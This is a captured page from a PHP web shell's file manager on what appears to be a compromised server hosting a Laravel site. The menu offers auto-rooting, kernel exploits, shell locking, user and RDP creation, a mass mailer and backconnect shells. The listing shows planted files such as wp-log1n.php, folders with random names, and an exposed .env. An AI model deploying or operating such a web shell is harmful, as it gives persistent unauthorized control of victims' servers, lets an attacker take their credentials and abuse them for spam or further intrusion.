Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdpms.com /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
13e38
[ DIR ]
dr-xr-xr-x
8421e6
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxr-xr-x
bootstrap
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
irkxgec
[ DIR ]
drwxr-xr-x
m1dtslb
[ DIR ]
drwxr-xr-x
njghtdo
[ DIR ]
drwxr-xr-x
node_modules
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
rcyzsxw
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
ryqijwt
[ DIR ]
drwxr-xr-x
storage
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
uhyarnv
[ DIR ]
drwxr-xr-x
vejwqi1
[ DIR ]
drwxr-xr-x
vendor
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
xjqdiwy
[ DIR ]
drwxr-xr-x
.editorconfig
220
B
-rw-r--r--
.env
748
B
-rw-r--r--
.env.example
730
B
-rw-r--r--
.gitattributes
111
B
-rw-r--r--
.gitignore
163
B
-rw-r--r--
.htaccess
1.13
KB
-r-xr-xr-x
.styleci.yml
174
B
-rw-r--r--
README.md
4.35
KB
-rw-r--r--
artisan
1.65
KB
-rw-r--r--
composer.json
2.17
KB
-rw-r--r--
composer.lock
310.31
KB
-rw-r--r--
defaults.php
1.72
KB
-r--r--r--
error_log
1.32
KB
-rw-r--r--
google0f195a36a1ebd30e.html
53
B
-rw-r--r--
index.php
12.43
KB
-r-xr-xr-x
license-pzwh.php
629
B
-rw-r--r--
networks.php
2.03
KB
-r--r--r--
options.php
2
KB
-r--r--r--
package-lock.json
453.05
KB
-rw-r--r--
package.json
1.35
KB
-rw-r--r--
phpunit.xml
1.37
KB
-rw-r--r--
plugins.php
1.72
KB
-r--r--r--
robots.txt
395
B
-r--r--r--
server.php
563
B
-rw-r--r--
tailwind.config.js
662
B
-rw-r--r--
webpack.mix.js
696
B
-rw-r--r--
wp-log1n.php
2
KB
-r--r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "laravel/laravel", "type": "project", "description": "The Laravel Framework.", "keywords": ["framework", "laravel"], "license": "MIT", "require": { "php": "^8.1", "guzzlehttp/guzzle": "^7.2", "laravel/framework": "^10.0", "laravel/sanctum": "^3.2", "laravel/tinker": "^2.8", "appstract/laravel-options": "^5.2", "cviebrock/eloquent-sluggable": "^10.0", "laravelcollective/html": "^6.3.0", "mcamara/laravel-localization": "^1.8", "spatie/laravel-permission": "^5.10", "laravel/ui": "^4.0" }, "require-dev": { "fakerphp/faker": "^1.9.1", "laravel/pint": "^1.0", "laravel/sail": "^1.18", "mockery/mockery": "^1.4.4", "nunomaduro/collision": "^7.0", "phpunit/phpunit": "^10.0", "spatie/laravel-ignition": "^2.0" }, "autoload": { "files": [ "app/Helpers/Helper.php" ], "psr-4": { "App\\": "app/", "Database\\Factories\\": "database/factories/", "Database\\Seeders\\": "database/seeders/" } }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "scripts": { "post-autoload-dump": [ "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump", "@php artisan package:discover --ansi" ], "post-update-cmd": [ "@php artisan vendor:publish --tag=laravel-assets --ansi --force" ], "post-root-package-install": [ "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "@php artisan key:generate --ansi" ] }, "extra": { "branch-alias": { "dev-master": "10.x-dev" }, "laravel": { "dont-discover": [] } }, "config": { "optimize-autoloader": true, "preferred-install": "dist", "sort-packages": true, "allow-plugins": { "pestphp/pest-plugin": true } }, "minimum-stability": "stable", "prefer-stable": true }
Close